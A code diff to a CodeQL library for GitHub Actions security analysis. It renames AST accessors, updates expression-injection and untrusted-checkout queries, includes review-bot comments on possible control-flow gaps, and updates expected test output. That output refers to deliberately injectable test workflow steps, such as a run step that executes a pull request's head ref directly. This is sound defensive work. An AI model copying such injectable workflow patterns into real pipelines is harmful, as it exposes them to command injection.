*/ - string getGitHubRepository() { - result = - ( - this.getValue().regexpCapture(usesParser(), 1) + "/" + - this.getValue().regexpCapture(usesParser(), 2) - ).toLowerCase() - } - - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - string getVersion() { result = this.getValue().regexpCapture(usesParser(), 3) } - } - - /** - * A `with` field within an Actions job step, which references an action as a reusable unit of code. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepswith. - * - * For example: - * ``` - * with: - * arg1: 1 - * arg2: abc - * ``` - */ - class With extends YamlNode, YamlMapping { - Step step; - - With() { step.lookup("with") = this } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } - } - - /** - * A `ref:` field within an Actions `with:` specific to `actions/checkout` action. - * - * For example: - * ``` - * uses: actions/checkout@v2 - * with: - * ref: ${{ github.event.pull_request.head.sha }} - * ``` - */ - class Ref extends YamlNode, YamlString { - With with; - - Ref() { with.lookup("ref") = this } - - /** Gets the `with` field this field belongs to. */ - With getWith() { result = with } - } - - /** - * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. - * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. - * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. 
- * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} - */ - string getASimpleReferenceExpression(YamlString node) { - // We use `regexpFind` to obtain *all* matches of `${{...}}`, - // not just the last (greedy match) or first (reluctant match). - result = - node.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, _) - .regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) - } - - /** Extracts the 'name' part from env.name */ - bindingset[name] - string getEnvName(string name) { result = name.regexpCapture("env\\.([A-Za-z0-9_]+)", 1) } - - /** - * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. - * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. - */ - class Run extends YamlNode, YamlString { - Step step; - - Run() { step.lookup("run") = this } - - /** Gets the step that executes this `run` command. */ - Step getStep() { result = step } - } - - /** - * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds - */ - class Needs extends YamlNode { - Job job; - - Needs() { job.lookup("needs") = this } - - Job getJob() { result = job } - - Job getANeededJob() { - if this instanceof YamlString - then result.getId() = this.(YamlString).getValue() and result.getFile() = job.getFile() - else - if this instanceof YamlSequence - then - result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and - result.getFile() = job.getFile() - else none() - } - } -} diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 661544dfed25..d64c91f7bb77 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll 
+++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -77,7 +77,6 @@ module Completion { class ReturnSuccessor extends SuccessorType, TReturnSuccessor { override string toString() { result = "return" } } - // Why is there no conditional successor type? } module CfgScope { @@ -149,7 +148,7 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos rank[i](AstNode child, Location l | ( child = this.(CompositeAction).getAnInput() or - child = this.(CompositeAction).getAnOutputExpr() or + child = this.(CompositeAction).getAnOutput() or child = this.(CompositeAction).getRuns() ) and l = child.getLocation() @@ -172,10 +171,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { result = rank[i](AstNode child, Location l | ( - child = this.(ReusableWorkflow).getAJob() or child = this.(ReusableWorkflow).getAnInput() or - child = this.(ReusableWorkflow).getAnOutputExpr() or - child = this.(ReusableWorkflow).getStrategy() + child = this.(ReusableWorkflow).getAnOutput() or + child = this.(ReusableWorkflow).getStrategy() or + child = this.(ReusableWorkflow).getAJob() ) and l = child.getLocation() | @@ -203,7 +202,7 @@ private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getOutputExpr(_) and l = child.getLocation() + child = super.getOutput(_) and l = child.getLocation() | child order by @@ -216,7 +215,7 @@ private class StrategyTree extends StandardPreOrderTree instanceof Strategy { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getMatrixVariableExpr(_) and l = child.getLocation() + child = super.getMatrixVariable(_) and l = child.getLocation() | child order by 
@@ -248,7 +247,7 @@ private class UsesTree extends StandardPreOrderTree instanceof Uses { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and + (child = super.getArgument(_) or child = super.getEnvVar(_)) and l = child.getLocation() | child @@ -262,7 +261,7 @@ private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getEnvExpr(_) or child = super.getScriptExpr()) and + (child = super.getEnvVar(_) or child = super.getScript()) and l = child.getLocation() | child @@ -276,11 +275,4 @@ private class UsesLeaf extends LeafTree instanceof Uses { } private class InputTree extends LeafTree instanceof Input { } -// private class OutputExprTree extends LeafTree instanceof OutputExpr { } -// -// private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } -// -// private class EnvExprTree extends LeafTree instanceof EnvExpr { } -private class ExprAccessTree extends LeafTree instanceof ContextExpression { } - -private class AstNodeLeaf extends LeafTree instanceof Expression { } +private class StringLiteralLeaf extends LeafTree instanceof StringLiteral { } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 479078fe18b2..c427f8b828a0 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -52,7 +52,7 @@ predicate externallyDefinedSource( ) and ( if fieldName.trim().matches("env.%") - then source.asExpr() = uses.getEnvExpr(fieldName.trim().replaceAll("env.", "")) + then source.asExpr() = uses.getEnvVar(fieldName.trim().replaceAll("env.", "")) else if fieldName.trim().matches("output.%") then source.asExpr() = uses 
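Review bot: After the @@ -276 hunk, `Expression` and `ContextExpression` nodes have no `LeafTree` instance any more — only `StringLiteralLeaf` is left — while the `UsesTree` and `RunTree` hunks above still emit `getArgument(_)`, `getEnvVar(_)` and `getScript()` as children. The UntrustedCheckout.ql hunk later in this patch casts `getArgument("ref")` to `Expression`, so argument children can be `Expression` nodes; unless `Expression` now extends `StringLiteral`, or gets a `ControlFlowTree` instance in a part of Cfg.qll outside these hunks, those children would have no tree and would drop out of the CFG that `ArgumentNode.argumentOf` walks with `getASuccessor+()`. A short comment on the new leaf would pin the invariant, e.g. `// Every child emitted by UsesTree/RunTree (arguments, env vars, script) must be a StringLiteral to get a leaf here.` The @@ -172 reorder of the `ReusableWorkflow` disjuncts is harmless, since `rank` orders by location rather than by disjunct order.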
@@ -76,10 +76,10 @@ predicate externallyDefinedStoreStep( ) and ( if input.trim().matches("env.%") - then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) + then pred.asExpr() = uses.getEnvVar(input.trim().replaceAll("env.", "")) else if input.trim().matches("input.%") - then pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + then pred.asExpr() = uses.getArgument(input.trim().replaceAll("input.", "")) else none() ) and succ.asExpr() = uses @@ -90,10 +90,10 @@ predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { exists(Uses uses, string action, string version, string input | ( if input.trim().matches("env.%") - then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) + then sink.asExpr() = uses.getEnvVar(input.trim().replaceAll("env.", "")) else if input.trim().matches("input.%") - then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + then sink.asExpr() = uses.getArgument(input.trim().replaceAll("input.", "")) else none() ) and sinkModel(action, version, input, kind) and diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 64df342ae9b7..0dea91af2b92 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -36,9 +36,9 @@ class AdditionalTaintStep extends Unit { predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run r, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and - r.getEnvExpr(varName) = pred.asExpr() and + r.getEnvVar(varName) = pred.asExpr() and exists(string script, string line | - script = r.getScript() and + script = r.getScript().getValue() and line = script.splitAt("\n") and ( output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or 
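Review bot: `output.replaceAll("output\\.", "")` in the unchanged `c = any(...)` line of the FlowSteps.qll hunk looks like a no-op: QL's `replaceAll` takes a literal, not a regex, so it searches for the text `output\.` (backslash-dot), which a name captured from `name=(.*)::` never contains; compare the literal `replaceAll("env.", "")` form used in the ExternalFlow.qll hunks of this same patch. Either the prefix strip is intended and should be `output.regexpReplaceAll("^output\\.", "")`, or it is a leftover and the line should read `ct.getName() = output`. On the following lines, the greedy `(.*)` in `".*::set-output\\s+name=(.*)::.*"` runs to the last `::` on the line, so a value that itself contains `::` is folded into the captured name; `name=(.*?)::.*` captures only the name. The `exists` body and the remaining `or` alternatives continue outside the hunk.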
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index d99db775d613..57ef47434871 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -162,7 +162,7 @@ class ParameterPosition extends string { * Made a string to match `With:` keys in the AST */ class ArgumentPosition extends string { - ArgumentPosition() { exists(any(Uses e).getArgumentExpr(this)) } + ArgumentPosition() { exists(any(Uses e).getArgument(this)) } } /** @@ -301,7 +301,7 @@ predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node */ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { exists(Outputs out, string fieldName | - node1.asExpr() = out.getOutputExpr(fieldName) and + node1.asExpr() = out.getOutput(fieldName) and node2.asExpr() = out and c = any(FieldContent ct | ct.getName() = fieldName) ) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index dbae273151b0..3a21005e29be 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -78,12 +78,12 @@ class CallNode extends ExprNode { * An argument to a Uses step (call). */ class ArgumentNode extends ExprNode { - ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgumentExpr(_) } + ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgument(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = - any(Uses e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) + any(Uses e | e.getArgument(pos) = this.getCfgNode().getAstNode()) } } 
diff --git a/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml b/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml deleted file mode 100644 index df2fe6e37348..000000000000 --- a/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml +++ /dev/null @@ -1,39 +0,0 @@ ---- -sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib -baselineLinesOfCode: 0 -unicodeNewlines: false -columnKind: utf16 -primaryLanguage: yaml -inProgress: - primaryLanguage: yaml - installedExtractors: - go: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/go - python: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/python - java: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/java - html: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/html - xml: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/xml - properties: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/properties - cpp: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/cpp - swift: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/swift - csv: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/csv - yaml: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/yaml - csharp: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/csharp - javascript: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/javascript - ruby: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/ruby -creationMetadata: - cliVersion: 2.16.0 - creationTime: 2024-02-02T10:02:02.082819Z -finalised: false diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 4b78f275382a..ac829c2395e8 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql 
+++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScript() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 0edeb0a7ec80..02e17b76ac5c 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) + exists(CompositeAction c | c.getAnOutput() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index 59a05f64b6c9..7ca865609983 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) + exists(CompositeAction c | c.getAnOutput() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 28ff074fd966..fd4350efae8a 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql 
@@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScript() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index 6e88f36feced..7b0f3159357c 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutput() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 4f710a16e8f6..699c5b2b5dcb 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutput() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 63f1a7a9d3a3..1f7797b8a0a7 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql 
@@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScript() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index b13bf88abe64..0bf4e858db20 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScript() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 34bcbd7b0605..58561ca6dba4 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -21,7 +21,7 @@ private predicate isTrustedOrg(string repo) { exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) } -from StepUses uses, string repo, string version, Workflow workflow, string name +from UsesStep uses, string repo, string version, Workflow workflow, string name where uses.getCallee() = repo and uses.getEnclosingWorkflow() = workflow and diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index ed96d5f07c1b..2e3dc7049bd6 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql 
@@ -32,14 +32,14 @@ class LabelCheck extends If { } } -from Workflow w, Job job, StepUses checkoutStep +from Workflow w, Job job, UsesStep checkoutStep where w.hasTriggerEvent("pull_request_target") and w.getAJob() = job and job.getAStep() = checkoutStep and checkoutStep.getCallee() = "actions/checkout" and checkoutStep - .getArgumentExpr("ref") + .getArgument("ref") .(Expression) .getExpression() .matches([ diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index ffbbed2bac18..4d290a906044 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -71,156 +71,179 @@ yamlNodes | .github/workflows/test.yml:40:9:40:11 | run | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | jobNodes -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | stepNodes -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | allUsesNodes -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | stepUsesNodes -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... 
d files | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | jobUsesNodes +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | usesSteps -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | runSteps -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | id: sink | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | runStepChildren -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... 
iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:9:28:10 | id | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:9:29:11 | run | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:9:39:10 | id | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:9:40:11 | run | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:28:10 | id | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:9:29:11 | run | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... 
.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:39:10 | id | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:9:40:11 | run | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | parentNodes | .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:3:1:3:4 | jobs | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:4:3:4:6 | job1 | .github/workflows/test.yml:4:3:40:53 | job1: | | .github/workflows/test.yml:4:3:40:53 | job1: | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:5:11 | runs-on | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:7:5:7:11 | outputs | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | runs-on ... 
-latest | -| .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:12:9:12:12 | with | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:5:5:5:11 | runs-on | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:7:5:7:11 | outputs | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:7:31:2 | - uses: ... 
